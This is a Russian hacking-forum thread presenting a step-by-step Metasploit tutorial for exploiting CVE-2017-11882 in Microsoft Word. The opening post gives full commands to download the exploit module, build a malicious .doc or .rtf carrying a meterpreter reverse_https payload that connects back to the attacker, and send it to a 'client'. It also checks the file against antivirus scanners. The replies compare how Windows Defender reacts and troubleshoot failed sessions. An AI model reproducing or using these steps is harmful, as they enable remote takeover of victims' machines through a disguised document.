ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)
-   -   CVE-2017-11882 MS Word Metasploit (https://forum.antichat.xyz/showthread.php?t=561279)

adm2 26.11.2017 16:37

Добрый день.
Один доллар (@OneDollar)показал пример эксплуатации уязвимости через Empire Powershell

CVE-2017-11882 или Взлом с помощью безобидного документа


Мы рассмотрим альтернативный вариант через Metasploit:
Скачаем и перенесём експлоит

Код:


Код:

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
cp office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

Запускаем metasploit и выбираем наш модуль.

Код:


Код:

service postgresql start
msfconsole
use exploit/windows/fileformat/office_ms17_11882

Просмотрим информацию о модуле

Код:


Код:

info
https://forum.antichat.xyz/attachments/4790325/1.png

Из описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности?

Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой

Код:


Код:

set FILENAME /root/exp.doc
Можно поставить и *.rtf, отработает и так и так.

Добавляем пейлоад и запускаем

Код:


Код:

set payload windows/meterpreter/reverse_https
set lhost 192.168.0.100 (адрес атакующего)
set lport 4443 (как обычно, можете выбирать почти любой)
exploit

Собственно, всё.
Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы).
Запускаем, ловим сессию.

https://forum.antichat.xyz/attachments/4790325/2.png

AV так же не стоит на месте
https://nodistribute.com/result/BUZqx1mACKldLr3
На палевность можете даже и не смотреть ибо через месяц тут будет поголовно всё красное =)

Информация дана для ознакомления, спасибо за внимание)

Альтернативный вариант пост эксплуатации через Empire Powershell
CVE-2017-11882 или Взлом с помощью безобидного документа

z3r0c10wn 27.11.2017 13:59

Test - windows defender with last updates \ Windows Office unpatched -
Дефендер палит нагрузку но уже после выполнения через memory corruption. Соответственно сессию создаст. Хотя сделает вид что запалил.

adm2 27.11.2017 14:11

За всё время тестов любого ПО я понял, что сессия meterpreter странный предмет, вроде и создана, а вроде и нет =)

z3r0c10wn 27.11.2017 14:15

Цитата:


OneDollar сказал(а):

Хорошее дополнение, молодец что подметил!
[doublepost=1511776867,1511776833][/doublepost]
сессия создана будет, но не рабочая..


15 минут назад тестил - сессия работает! Офис не пропатчен, ломаный. Винда офф - дефендер с последними апдейтами.
Сессия активна.

Vander 27.11.2017 21:23

Windows 8.1, Windows 10 - Все Last Update, дефендер уничтожает полезную нагрузку.

adm2 28.11.2017 08:09

Цитата:


Vander сказал(а):

Windows 8.1, Windows 10 - Все Last Update, дефендер уничтожает полезную нагрузку.


и это печально)

adm2 28.11.2017 14:16

Цитата:


TST сказал(а):

У кого встречалась траблы с Empire, когда выполняешь execute:
[!] Invalid listener ID or name.
Как ее обойти либо решить?

Она у тебя просит поднятый листенер)
Выходишь в основное меню

Код:


Код:

main
listeners
uselistener http
execute

А потом уже возвращается в стейджер

https://forum.antichat.xyz/attachments/4790617/2017.png

ivanov-sv-2015 29.11.2017 21:07

При добавлении текста в документ сессия не поднимается. Office 2013. Кто-нибудь сталкивался?

adm2 29.11.2017 21:28

Цитата:


ivanov-sv-2015 сказал(а):

При добавлении текста в документ сессия не поднимается. Office 2013. Кто-нибудь сталкивался?


Пха-ха) а о внесении изменений в документ я и не задумывался)) действительно сессия не прилетает)
ну ничего) пройдёт неделька, другая обязательно появится решение)

ivanov-sv-2015 29.11.2017 21:28

Цитата:


OneDollar сказал(а):

скажешь потом что перепутал


Точно!


Время: 03:39